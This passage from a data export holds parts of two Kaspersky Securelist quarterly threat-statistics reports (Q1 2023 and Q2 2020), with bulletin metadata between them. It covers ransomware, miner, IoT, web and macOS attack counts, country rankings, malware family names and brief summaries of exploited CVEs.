_Number of new ransomware modifications, Q1 2022 – Q1 2023 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/06/06161738/03-en-ru-es-malware-report-q1-2023-pc-statistics.png>))_

### Number of users attacked by ransomware Trojans

In Q1 2023, Kaspersky products and technologies protected 60,900 users from ransomware attacks.

_Number of unique users attacked by ransomware Trojans, Q1 2023 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/06/06161811/04-en-malware-report-q1-2023-pc-statistics.png>))_

### Geography of attacked users

**TOP 10 countries/territories attacked by ransomware Trojans**

| | **Country/territory\*** | **%\*\*** |
|---|---|---|
| 1 | Yemen | 1.50 |
| 2 | Bangladesh | 1.47 |
| 3 | Taiwan | 0.65 |
| 4 | Mozambique | 0.59 |
| 5 | Pakistan | 0.47 |
| 6 | South Korea | 0.42 |
| 7 | Venezuela | 0.32 |
| 8 | Iraq | 0.30 |
| 9 | 
Nigeria | 0.30 \n10 | Libya | 0.26 \n \n_* Excluded are countries/territories with relatively few Kaspersky users (under 50,000)._ \n_** Unique users whose computers were attacked by ransomware Trojans as a percentage of all unique users of Kaspersky products in the country/territory._\n\n### TOP 10 most common families of ransomware Trojans\n\n| **Name** | **Verdicts*** | **Percentage of attacked users**** \n---|---|---|--- \n1 | Magniber | Trojan-Ransom.Win64.Magni / Trojan-Ransom.Win32.Magni | 15.73 \n2 | WannaCry | Trojan-Ransom.Win32.Wanna | 12.40 \n3 | (generic verdict) | Trojan-Ransom.Win32.Gen | 12.27 \n4 | (generic verdict) | Trojan-Ransom.Win32.Encoder | 8.77 \n5 | (generic verdict) | Trojan-Ransom.Win32.Agent | 6.65 \n6 | (generic verdict) | Trojan-Ransom.Win32.Phny | 6.52 \n7 | Stop/Djvu | Trojan-Ransom.Win32.Stop | 5.90 \n8 | PolyRansom/VirLock | Trojan-Ransom.Win32.PolyRansom / Virus.Win32.PolyRansom | 3.74 \n9 | (generic verdict) | Trojan-Ransom.Win32.Crypren | 3.52 \n10 | (generic verdict) | Trojan-Ransom.Win32.CryFile | 2.06 \n \n_* Statistics are based on detection verdicts of Kaspersky products. 
The information was provided by Kaspersky product users who consented to providing statistical data._ \n_** Unique Kaspersky users attacked by specific ransomware Trojan families as a percentage of all unique users attacked by ransomware Trojans._\n\n## Miners\n\n### Number of new miner modifications\n\nIn Q1 2023, Kaspersky solutions detected 1733 new modifications of miners.\n\n_Number of new miner modifications, Q1 2023 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/06/06161841/05-en-malware-report-q1-2023-pc-statistics.png>))_\n\n### Number of users attacked by miners\n\nIn Q1, we detected attacks using miners on the computers of 403,211 unique users of Kaspersky products worldwide.\n\n_Number of unique users attacked by miners, Q1 2023 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/06/06161916/06-en-malware-report-q1-2023-pc-statistics.png>))_\n\n### Geography of miner attacks\n\n**TOP 10 countries/territories attacked by miners**\n\n| **Country/territory*** | **%**** \n---|---|--- \n1 | Tajikistan | 2.87 \n2 | Kazakhstan | 2.52 \n3 | Uzbekistan | 2.30 \n4 | Kyrgyzstan | 2.18 \n5 | Belarus | 1.80 \n6 | Venezuela | 1.77 \n7 | Ethiopia | 1.73 \n8 | Ukraine | 1.73 \n9 | Mozambique | 1.63 \n10 | Rwanda | 1.50 \n \n_* Excluded are countries/territories with relatively few users of Kaspersky products (under 50,000)._ \n_** Unique users attacked by miners as a percentage of all unique users of Kaspersky products in the country/territory._\n\n## Vulnerable applications used in cyberattacks\n\n### Quarterly highlights\n\nQ1 2023 saw a number of Windows vulnerabilities remediated and published. Some of those were the following:\n\n * [CVE-2023-23397](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2023-23397>): probably the most high-profile vulnerability, which provoked much online debate and discussion. 
This Windows vulnerability allows starting automatic authentication on behalf of the user on a host running Outlook.\n * [CVE-2023-21674](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2023-21674>): a vulnerability in the ALPC subsystem that allows a malicious actor to escalate their privileges to system level.\n * [CVE-2023-21823](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2023-21823>): a Windows Graphics Component vulnerability that allows running commands in the system on behalf of the user. This can be reproduced both in Windows desktop versions of Microsoft Office and in mobile (iOS and Android) versions.\n * [CVE-2023-23376](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2023-23376>): a Common Log File System Driver vulnerability that allows escalating privileges to system level.\n * [CVE-2023-21768](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2023-21768>): a vulnerability in the Ancillary Function Driver for WinSock that allows obtaining system privileges.\n\nA Microsoft fix for each of the vulnerabilities is out, and we strongly encourage you to install all the relevant patches.\n\nThe main network threats in Q1 2023 were [brute-force](<https://encyclopedia.kaspersky.com/glossary/brute-force/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>) attacks on MSSQL and RDP services. EternalBlue and EternalRomance remained popular exploits for operating system vulnerabilities. We detected notably large numbers of attacks and scans that targeted log4j-type vulnerabilities ([CVE-2021-44228](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2021-44228>)).\n\n### Vulnerability statistics\n\nIn Q1 2023, Kaspersky products detected more than 300,000 exploitation attempts, most of these using Microsoft Office exploits. Their share was 78.96%, down by just 1 p.p. from the previous quarter. 
The most-exploited vulnerabilities in that category were the following:\n\n * [CVE-2017-11882](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882>) and [CVE-2018-0802](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-0802>): Equation Editor vulnerabilities that allow corrupting application memory during formula processing to then run arbitrary code in the system.\n * [CVE-2017-0199](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0199>), which allows using MS Office to load malicious scripts.\n * [CVE-2017-8570](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8570>), which allows loading malicious HTA scripts into the system.\n\nThe second most-exploited category was browser vulnerabilities (7.07%), whose share grew by 1 p.p. We did not discover any new browser vulnerabilities exploited by malicious actors in the wild. Q2 2023 might bring something new.\n\n_Distribution of exploits used by cybercriminals by type of attacked application, Q1 2023 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/06/06162000/07-en-malware-report-q1-2023-pc-statistics.png>))_\n\nAndroid (4.04%) and Java (3.93%) were third and fourth, respectively. Android exploits lost 1 p.p. during the period, whereas the share of Java exploits remained unchanged. The fifth- and sixth-place scores \u2014 Adobe Flash (3.49%) and PDF (2.52%) \u2014 were very close to the previous quarter's figures as well.\n\n## Attacks on macOS\n\nThe first quarter's high-profile event was a [supply-chain attack on the 3CX app](<https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/3cx-supply-chain-attack>), including the macOS version. 
Hackers were able to embed malicious code into the libffmpeg media processing library to download a payload from their servers.\n\nWorth noting is the [MacStealer spy program](<https://www.uptycs.com/blog/macstealer-command-and-control-c2-malware>), also discovered in Q1 2023, which stole cookies from the victim's browser, as well as account details and cryptowallet passwords.\n\n**TOP 20 threats for macOS**\n\n| **Verdict** | **%*** \n---|---|--- \n1 | AdWare.OSX.Pirrit.ac | 11.87 \n2 | AdWare.OSX.Amc.e | 8.41 \n3 | AdWare.OSX.Pirrit.j | 7.98 \n4 | AdWare.OSX.Agent.ai | 7.58 \n5 | Monitor.OSX.HistGrabber.b | 6.64 \n6 | AdWare.OSX.Bnodlero.ax | 6.12 \n7 | AdWare.OSX.Pirrit.ae | 5.77 \n8 | AdWare.OSX.Agent.gen | 4.98 \n9 | Hoax.OSX.MacBooster.a | 4.76 \n10 | Trojan-Downloader.OSX.Agent.h | 4.66 \n11 | AdWare.OSX.Pirrit.o | 3.63 \n12 | Backdoor.OSX.Twenbc.g | 3.52 \n13 | AdWare.OSX.Bnodlero.bg | 3.32 \n14 | AdWare.OSX.Pirrit.aa | 3.20 \n15 | Backdoor.OSX.Twenbc.h | 3.14 \n16 | AdWare.OSX.Pirrit.gen | 3.14 \n17 | Downloader.OSX.InstallCore.ak | 2.37 \n18 | Trojan-Downloader.OSX.Lador.a | 2.03 \n19 | RiskTool.OSX.Spigot.a | 1.92 \n20 | Trojan.OSX.Agent.gen | 1.88 \n \n_* Unique users who encountered this malware as a percentage of all users of Kaspersky security products for macOS who were attacked._\n\nAdware remained the most widespread threat to macOS users. 
In addition to that, we frequently came across all kinds of system "cleaners" and "optimizers", many of these containing highly annoying ads or classic scams, where users were offered paid solutions to problems that did not exist.\n\n### Geography of threats for macOS\n\n**TOP 10 countries/territories by share of attacked users**\n\n| **Country/territory*** | **%**** \n---|---|--- \n1 | Italy | 1.43 \n2 | Spain | 1.39 \n3 | France | 1.37 \n4 | Russian Federation | 1.29 \n5 | Mexico | 1.20 \n6 | Canada | 1.18 \n7 | United States | 1.16 \n8 | United Kingdom | 0.98 \n9 | Australia | 0.87 \n10 | Brazil | 0.81 \n \n_* Excluded from the rankings are countries/territories with relatively few users of Kaspersky security solutions for macOS (under 10,000)._ \n_** Unique attacked users as a percentage of all users of Kaspersky macOS security products in the country/territory._\n\nItaly (1.43%) and Spain (1.39%) became the leaders by share of attacked users, as France (1.37%), Russia (1.29%) and Canada (1.18%) lost a few percentage points. 
Overall, the percentage of attacked users in the TOP 10 countries did not change much.\n\n## IoT attacks\n\n### IoT threat statistics\n\nIn Q1 2023, a majority of the devices that attacked Kaspersky honeypots still used the Telnet protocol, but its popularity decreased somewhat from the previous quarter.\n\nTelnet | 69.2% \n---|--- \nSSH | 30.8% \n \n_Distribution of attacked services by number of unique IP addresses of attacking devices, Q1 2023_\n\nIn terms of session numbers, Telnet accounted for the absolute majority.\n\nTelnet | 97.8% \n---|--- \nSSH | 2.2% \n \n_Distribution of cybercriminal working sessions with Kaspersky traps, Q1 2023_\n\n**TOP 10 countries/territories as sources of SSH attacks**\n\n**Country/territory** | **%* (Q4 2022)** | **%* (Q1 2023)** \n---|---|--- \nTaiwan | 1.60 | 12.13 \nUnited States | 19.11 | 12.05 \nSouth Korea | 3.32 | 7.64 \nMainland China | 8.45 | 6.80 \nBrazil | 5.10 | 5.08 \nIndia | 6.26 | 4.45 \nGermany | 6.20 | 4.00 \nVietnam | 2.18 | 3.95 \nSingapore | 6.63 | 3.63 \nRussian Federation | 3.33 | 3.36 \nOther | 37.81 | 36.91 \n \n_* Unique IP addresses located in a country/territory as a percentage of all unique IP addresses where SSH attacks on Kaspersky honeypots originated._\n\nThe APAC countries/territories and the U.S. 
remained the main sources of SSH attacks in Q1 2023.\n\n**TOP 10 countries/territories as sources of Telnet attacks**\n\n**Country/territory** | **%* (Q4 2022)** | **%* (Q1 2023)** \n---|---|--- \nMainland China | 46.90 | 39.92 \nIndia | 6.61 | 12.06 \nTaiwan | 6.37 | 7.51 \nBrazil | 3.31 | 4.92 \nRussian Federation | 4.53 | 4.82 \nUnited States | 4.33 | 4.30 \nSouth Korea | 7.39 | 2.59 \nIran | 1.05 | 1.50 \nPakistan | 1.40 | 1.41 \nKenya | 0.06 | 1.39 \nOther | 18.04 | 19.58 \n \n_* Unique IP addresses located in a country/territory as a percentage of all unique IP addresses where Telnet attacks on Kaspersky honeypots originated._\n\nMainland China (39.92%) remained the largest source of Telnet attacks, with India's (12.06%) and Kenya's (1.39%) contributions increasing significantly. The share of attacks that originated in South Korea (2.59%) decreased.\n\n**TOP 10 threats delivered to IoT devices via Telnet**\n\n| **Verdict** | **%*** \n---|---|--- \n1 | Trojan-Downloader.Linux.NyaDrop.b | 41.39% \n2 | Backdoor.Linux.Mirai.b | 18.82% \n3 | Backdoor.Linux.Mirai.cw | 9.63% \n4 | Backdoor.Linux.Mirai.ba | 6.18% \n5 | Backdoor.Linux.Gafgyt.a | 2.64% \n6 | Backdoor.Linux.Mirai.fg | 2.25% \n7 | Backdoor.Linux.Mirai.ew | 1.89% \n8 | Trojan-Downloader.Shell.Agent.p | 1.77% \n9 | Backdoor.Linux.Gafgyt.bj | 1.24% \n10 | Trojan-Downloader.Linux.Mirai.d | 1.23% \n \n_* Share of each threat delivered to infected devices as a result of a successful Telnet attack out of the total number of delivered threats._\n\n## Attacks via web resources\n\n_The statistics in this section are based on Web Anti-Virus, which protects users when malicious objects are downloaded from malicious/infected web pages. 
Cybercriminals create malicious sites deliberately; infected sites can be hacked legitimate resources as well as web resources with user-created content, such as forums._\n\n### Countries/territories that serve as sources of web-based attacks: TOP 10\n\n_The following statistics show the distribution by country/territory of the sources of internet attacks blocked by Kaspersky products on user computers (web pages with redirects to exploits, sites hosting malicious programs, botnet C&C centers, etc.). Any unique host could be the source of one or more web-based attacks._\n\n_To determine the geographic source of web attacks, the GeoIP technique was used to match the domain name to the real IP address at which the domain is hosted._\n\nIn Q1 2023, Kaspersky solutions blocked 865,071,227 attacks launched from online resources across the globe. A total of 246,912,694 unique URLs were detected as malicious by Web Anti-Virus.\n\n_Distribution of web-attack sources across countries, Q1 2023 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/06/06162039/08-en-malware-report-q1-2023-pc-statistics.png>))_\n\n### Countries/territories where users faced the greatest risk of online infection\n\nTo assess the risk of online infection faced by users in various countries/territories, we calculated the percentage of Kaspersky users on whose computers Web Anti-Virus was triggered at least once during the quarter in each country/territory. 
The resulting data provides an indication of the aggressiveness of the environment in which computers operate in various countries.\n\nNote that these rankings only include attacks by malicious objects that fall under the **Malware** class; they do not include Web Anti-Virus detections of potentially dangerous or unwanted programs, such as RiskTool or adware.\n\n| **Country/territory*** | **%**** \n---|---|--- \n1 | Turkey | 16.88 \n2 | Taiwan | 16.01 \n3 | Algeria | 15.95 \n4 | Palestine | 15.30 \n5 | Albania | 14.95 \n6 | Yemen | 14.94 \n7 | Serbia | 14.54 \n8 | Tunisia | 14.13 \n9 | South Korea | 13.98 \n10 | Libya | 13.93 \n11 | Sri Lanka | 13.85 \n12 | Greece | 13.53 \n13 | Syria | 13.51 \n14 | Nepal | 13.10 \n15 | Bangladesh | 12.92 \n16 | Georgia | 12.85 \n17 | Morocco | 12.80 \n18 | Moldova | 12.73 \n19 | Lithuania | 12.61 \n20 | Bahrain | 12.39 \n \n_* Excluded are countries/territories with relatively few Kaspersky users (under 10,000)._ \n_** Unique users targeted by **Malware**-class attacks as a percentage of all unique users of Kaspersky products in the country/territory._\n\nOn average during the quarter, 9.73% of internet users' computers worldwide were subjected to at least one **Malware**-class web attack.\n\n## Local threats\n\n_In this section, we analyze statistical data obtained from the OAS and ODS modules of Kaspersky products. 
It takes into account malicious programs that were found directly on users' computers or removable media connected to them (flash drives, camera memory cards, phones, external hard drives), or which initially made their way onto the computer in non-open form (for example, programs in complex installers, encrypted files, etc.)._\n\nIn Q1 2023, our File Anti-Virus detected 43,827,839 malicious and potentially unwanted objects.\n\n### Countries and territories where users faced the highest risk of local infection\n\nFor each country/territory, we calculated the percentage of Kaspersky product users on whose computers File Anti-Virus was triggered during the reporting period. These statistics reflect the level of personal computer infection in different countries/territories.\n\nThese rankings only include attacks by malicious programs that fall under the **Malware** class; they do not include File Anti-Virus detections of potentially dangerous or unwanted programs, such as RiskTool or adware.\n\n| **Country/territory*** | **%**** \n---|---|--- \n1 | Yemen | 45.38 \n2 | Turkmenistan | 44.68 \n3 | Afghanistan | 43.64 \n4 | Tajikistan | 42.57 \n5 | Cuba | 36.01 \n6 | Burundi | 35.20 \n7 | Syria | 35.17 \n8 | Bangladesh | 35.07 \n9 | Myanmar | 34.98 \n10 | Uzbekistan | 34.22 \n11 | South Sudan | 34.06 \n12 | Rwanda | 34.01 \n13 | Algeria | 33.94 \n14 | Guinea | 33.74 \n15 | Cameroon | 33.09 \n16 | Sudan | 33.06 \n17 | Chad | 33.06 \n18 | Tanzania | 32.50 \n19 | Benin | 32.42 \n20 | Malawi | 31.93 \n \n_* Excluded are countries/territories with relatively few Kaspersky users (under 10,000)._ \n_** Unique users on whose computers **Malware**-class local threats were blocked, as a percentage of all unique users of Kaspersky products in the country/territory._\n\nOn average worldwide, Malware-class local threats were registered on 15.22% of users' computers at least once during Q1 2023.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", 
"confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2023-06-07T08:00:18", "type": "securelist", "title": "IT threat evolution in Q1 2023. Non-mobile statistics", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0199", "CVE-2017-11882", "CVE-2017-8570", "CVE-2018-0802", "CVE-2021-44228", "CVE-2023-21674", "CVE-2023-21768", "CVE-2023-21823", "CVE-2023-23376", "CVE-2023-23397"], "modified": "2023-06-07T08:00:18", "id": "SECURELIST:F62AEEAB0355FAC92D225F808BBF00CD", "href": "https://securelist.com/it-threat-evolution-q1-2023-pc-statistics/109917/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-03T13:05:29", "description": "\n\n**[IT threat evolution Q2 2020. Review](<https://securelist.com/it-threat-evolution-q2-2020/98230/>) \n[IT threat evolution Q2 2020. 
Mobile statistics](<https://securelist.com/it-threat-evolution-q2-2020-mobile-statistics/98337/>)**\n\n_These statistics are based on detection verdicts of Kaspersky products received from users who consented to provide statistical data._\n\n## Quarterly figures\n\nAccording to Kaspersky Security Network, in Q2:\n\n * Kaspersky solutions blocked 899,744,810 attacks launched from online resources in 191 countries across the globe.\n * As many as 286,229,445 unique URLs triggered Web Anti-Virus components.\n * Attempted infections by malware designed to steal money via online access to bank accounts were logged on the computers of 181,725 unique users.\n * Ransomware attacks were defeated on the computers of 154,720 unique users.\n * Our File Anti-Virus detected 80,993,511 unique malware and potentially unwanted objects.\n\n## Financial threats\n\n### Financial threat statistics\n\nIn Q2 2020, Kaspersky solutions blocked attempts to launch one or more types of malware designed to steal money from bank accounts on the computers of 181,725 users.\n\n_Number of unique users attacked by financial malware, Q2 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/31105102/16-en-malware_q2-2020_stats_non-mobile.png>))_\n\n**Geography of attacks**\n\nTo evaluate and compare the risk of being infected by banking Trojans and ATM/POS malware worldwide, for each country we calculated the share of users of Kaspersky products that faced this threat during the reporting period out of all users of our products in that country.\n\n_Geography of financial malware attacks, Q2 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/31105134/17-en-malware_q2-2020_stats_non-mobile.png>))_\n\n**Top 10 countries by share of attacked users**\n\n| **Country*** | **%**** \n---|---|--- \n1 | Turkmenistan | 7.5 \n2 | Uzbekistan | 5.7 \n3 | Tajikistan | 5.6 \n4 | Afghanistan | 2.6 \n5 | Macedonia | 2.6 \n6 | Yemen | 2.2 \n7 
| Syria | 1.9 \n8 | Kazakhstan | 1.7 \n9 | Cyprus | 1.7 \n10 | Iran | 1.5 \n \n_* Excluded are countries with relatively few Kaspersky product users (under 10,000). \n** Unique users of Kaspersky products whose computers were targeted by financial malware as a share of all unique users of Kaspersky products in the country._\n\nAmong the banking Trojan families, the share of Backdoor.Win32.Emotet decreased markedly from 21.3% to 6.6%. This botnet's activity decreased at the end of Q1 2020, but the results only became clear in the second quarter. However, as we prepared this report, we noticed that Emotet was gradually recovering.\n\n**Top 10 banking malware families**\n\n| Name | Verdicts | %* \n---|---|---|--- \n1 | Zbot | Trojan.Win32.Zbot | 24.8 \n2 | RTM | Trojan-Banker.Win32.RTM | 18.6 \n3 | CliptoShuffler | Trojan-Banker.Win32.CliptoShuffler | 15.4 \n4 | Emotet | Backdoor.Win32.Emotet | 6.6 \n5 | Trickster | Trojan.Win32.Trickster | 4.7 \n6 | Nimnul | Virus.Win32.Nimnul | 4.3 \n7 | Danabot | Trojan-Banker.Win32.Danabot | 3.4 \n8 | SpyEye | Trojan-Spy.Win32.SpyEye | 3.0 \n9 | Nymaim | Trojan.Win32.Nymaim | 2.5 \n10 | Neurevt | Trojan.Win32.Neurevt | 1.4 \n \n_* Unique users attacked by this malware family as a percentage of all users attacked by financial malware._\n\n## Ransomware programs\n\n### Quarterly trend highlights\n\nThe attackers behind the Shade ransomware announced that they had ceased to distribute the Trojan. In addition, they published keys to decrypt files affected by all of its versions. The number of keys that had been accumulated over the years exceeded 750,000, and we [updated](<https://www.kaspersky.com/blog/shade-decryptor-2020/35246/>) our ShadeDecryptor utility to help Shade victims to regain access to their data.\n\nRansomware written in Go began surfacing more often than before. Examples of recently discovered Trojans include Sorena, Smaug, Hydra, Satan/M0rphine, etc. 
What is this: hackers showing an interest in new technology, ease of development or an attempt at making researchers' work harder? No one knows for sure.\n\n### Number of new modifications\n\nWe detected five new ransomware families and 4,406 new modifications of these malware programs in Q2 2020.\n\n_Number of new ransomware modifications detected, Q2 2019 \u2013 Q1 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/31105223/sl_malware_q2_pc_03_18-malware_q2-2020_stats_non-mobile.png>))_\n\n### Number of users attacked by ransomware Trojans\n\nKaspersky products and technologies protected 154,720 users from ransomware attacks in Q2 2020.\n\n_Number of unique users attacked by ransomware Trojans, Q2 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/31105258/19-en-malware_q2-2020_stats_non-mobile.png>))_\n\n### Geography of attacks\n\n_Geography of attacks by ransomware Trojans, Q2 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/31105418/20-en-malware_q2-2020_stats_non-mobile.png>))_\n\n**Top 10 countries attacked by ransomware Trojans**\n\n| **Country*** | **%**** \n---|---|--- \n1 | Bangladesh | 1.69% \n2 | Mozambique | 1.16% \n3 | Uzbekistan | 1.14% \n4 | Egypt | 0.97% \n5 | Ethiopia | 0.94% \n6 | China | 0.74% \n7 | Afghanistan | 0.67% \n8 | Pakistan | 0.57% \n9 | Vietnam | 0.55% \n10 | Mongolia | 0.49% \n \n_* Excluded are countries with relatively few Kaspersky users (under 50,000). 
\n** Unique users whose computers were attacked by Trojan encryptors as a share of all unique users of Kaspersky products in the country._\n\n### Top 10 most common families of ransomware Trojans\n\n| **Name** | **Verdicts** | **%*** \n---|---|---|--- \n1 | WannaCry | Trojan-Ransom.Win32.Wanna | 14.74% \n2 | (generic verdict) | Trojan-Ransom.Win32.Gen | 9.42% \n3 | (generic verdict) | Trojan-Ransom.Win32.Generic | 7.47% \n4 | (generic verdict) | Trojan-Ransom.Win32.Encoder | 7.11% \n5 | Stop | Trojan-Ransom.Win32.Stop | 7.06% \n6 | GandCrab | Trojan-Ransom.Win32.GandCrypt | 4.68% \n7 | (generic verdict) | Trojan-Ransom.Win32.Crypren | 4.28% \n8 | (generic verdict) | Trojan-Ransom.Win32.Phny | 3.29% \n9 | Cerber | Trojan-Ransom.Win32.Zerber | 2.19% \n10 | Crysis/Dharma | Trojan-Ransom.Win32.Crusis | 2.16% \n \n_* Unique Kaspersky users attacked by the specified family of ransomware Trojans as a percentage of all users attacked by ransomware Trojans._\n\n## Miners\n\n### Number of new modifications\n\nKaspersky solutions detected 3,672 new miner modifications in Q2 2020, which is several dozen times fewer than in the previous quarter.\n\n_Number of new miner modifications, Q2 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/31105534/21-en-malware_q2-2020_stats_non-mobile.png>))_\n\nThe difference can be explained by thousands of modifications of one miner family, which were detected in the first quarter. In the quarter under review, that miner's activity dwindled, which is reflected in the statistics.\n\n### Number of users attacked by miners\n\nWe detected miner attacks on the computers of 440,095 unique Kaspersky users worldwide in Q2 2020. 
This type of threat shows a clear downward trend.\n\n_Number of unique users attacked by miners, Q2 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/31105631/22-en-malware_q2-2020_stats_non-mobile.png>))_\n\n### Geography of attacks\n\n_Geography of miner attacks, Q2 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/31105702/23-en-malware_q2-2020_stats_non-mobile.png>))_\n\n**Top 10 countries attacked by miners**\n\n| **Country*** | **%**** \n---|---|--- \n1 | Afghanistan | 4.08% \n2 | Ethiopia | 4.04% \n3 | Uzbekistan | 2.68% \n4 | Tanzania | 2.57% \n5 | Vietnam | 2.17% \n6 | Rwanda | 2.11% \n7 | Kazakhstan | 2.08% \n8 | Sri Lanka | 1.97% \n9 | Mozambique | 1.78% \n10 | Belarus | 1.41% \n \n_* Excluded are countries with relatively few Kaspersky product users (under 50,000). \n** Unique users whose computers were attacked by miners as a share of all unique users of Kaspersky products in the country._\n\n## Vulnerable applications used by cybercriminals during cyberattacks\n\nExploit distribution statistics for Q2 2020, as before, show that vulnerabilities in the Microsoft Office suite are the most common ones. However, their share decreased to 72% in the last quarter. The same vulnerabilities we had seen before still topped the list. [CVE-2017-8570](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8570>), which allows inserting a malicious script into an OLE object placed inside an Office document, was the most commonly exploited vulnerability. It was followed by the Q1 favorite, [CVE-2017-11882](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882>). Exploits for this vulnerability take advantage of a stack overflow error in the Equation Editor component of the Office suite. CVE-2017-8570, a vulnerability similar to [CVE-2017-0199](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0199>), came third. 
The remaining positions on the TOP 5 list were occupied by [CVE-2018-0802](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-0802>) and [CVE-2017-8759](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8759>).\n\nThe second category (exploits for popular browsers) accounted for about 12% in Q2, its share increasing slightly when compared to the previous period. During the reporting period, cybercriminals attacked Firefox using the [CVE-2020-6819](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6819>) vulnerability, which allows malicious code to be executed when an HTTP header is parsed incorrectly. Exploits that use the vulnerabilities in the ReadableStream interface, such as [CVE-2020-6820](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6820>), have been observed as well. No major vulnerability exploited to spread malware was observed during the reporting period for any of the other popular browsers: Google Chrome, Microsoft Edge, or Internet Explorer. However, researchers discovered in time a number of vulnerabilities that could potentially have been used to build exploits and reported them to the software vendors, who announced fixes.\n\n_Distribution of exploits used by cybercriminals, by type of attacked application, Q2 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/31105735/sl_malware_q2_pc_09_24-malware_q2-2020_stats_non-mobile.png>))_\n\nThe first quarter set a trend for researching font and other graphic primitives subsystems in Windows. In Q2, two vulnerabilities were discovered in Windows Codecs Library, assigned the identifiers [CVE-2020-1425](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1425>) and [CVE-2020-1457](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1457>). Both were fixed, and neither is known to have been exploited in the wild. 
Another interesting vulnerability fixed in the last quarter is [CVE-2020-1300](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1300>). It allows for remote execution of code due to incorrect processing of Cabinet files, for example, if the user is trying to run a malicious CAB file pretending to be a printer driver. Notably, the [CVE-2020-1299](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1299>) vulnerability allowed the attacker to execute arbitrary code with the user's privileges by generating a specially formatted LNK file.\n\nThe trend for brute-forcing of Remote Desktop Services, Microsoft SQL Services and SMB access passwords persisted in Q2 2020. No full-on network attacks that exploited new vulnerabilities in network exchange protocols were detected. However, software developers did discover and fix several vulnerabilities in popular network services. Among the most interesting ones was [CVE-2020-1301](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1301>) for SMBv1, which allowed the attacker to execute code remotely on a target system. [CVE-2020-0796](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0796>) (SMBGhost), a popular SMBv3 vulnerability among researchers, received unexpected follow-up in the form of an exploit that allowed compromising the system without interacting with the user. The same protocol version was found to contain an error, designated as [CVE-2020-1206](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1206>) and known as the SMBleed vulnerability, which allowed the attacker to read a portion of Windows kernel memory. The researchers even published several exploit versions that used a bundle of SMBleed and SMBGhost to execute code with system privileges. 
At that privilege level, the attacker can install any software and access any information on the computer.

## Attacks on Apple macOS

In Q2 2020, we discovered new versions of previously known threats and one new backdoor, which received the verdict Backdoor.OSX.Lador.a. The malware is notable for being written in Go, a language gaining popularity as a means of creating malware aimed at the macOS platform. If you compare the size of the Lador file with any backdoor created in Objective-C, the difference will be very significant: a Lador file is 5.5 megabytes, i.e. many times larger. And all this for the sake of remote access to the infected machine and execution of arbitrary code downloaded from the control center.

**Top 20 threats for macOS**

| Verdict | %\*
---|---|---
1 | Monitor.OSX.HistGrabber.b | 17.39
